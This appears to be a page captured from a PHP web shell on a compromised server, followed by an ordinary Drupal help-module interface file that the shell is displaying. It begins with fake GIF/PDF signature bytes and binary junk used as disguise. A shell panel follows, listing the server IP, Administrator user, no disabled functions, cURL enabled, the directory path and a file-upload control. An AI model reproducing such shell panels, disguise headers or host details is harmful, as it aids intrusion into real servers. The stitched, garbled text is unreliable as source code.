GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/help/src/ |
Upload File : |
<?php namespace Drupal\help; use Drupal\Component\Plugin\PluginInspectionInterface; use Drupal\Core\Cache\CacheableDependencyInterface; /** * Provides an interface for a plugin for a section of the /admin/help page. * * Plugins of this type need to be annotated with * \Drupal\help\Annotation\HelpSection annotation, and placed in the * Plugin\HelpSection namespace directory. They are managed by the * \Drupal\help\HelpSectionManager plugin manager class. There is a base * class that may be helpful: * \Drupal\help\Plugin\HelpSection\HelpSectionPluginBase. */ interface HelpSectionPluginInterface extends PluginInspectionInterface, CacheableDependencyInterface { /** * Returns the title of the help section. * * @return string * The title text, which could be a plain string or an object that can be * cast to a string. */ public function getTitle(); /** * Returns the description text for the help section. * * @return string * The description text, which could be a plain string or an object that * can be cast to a string. */ public function getDescription(); /** * Returns a list of topics to show in the help section. * * @return array * A sorted list of topic links or render arrays for topic links. The links * will be shown in the help section; if the returned array of links is * empty, the section will be shown with some generic empty text. */ public function listTopics(); }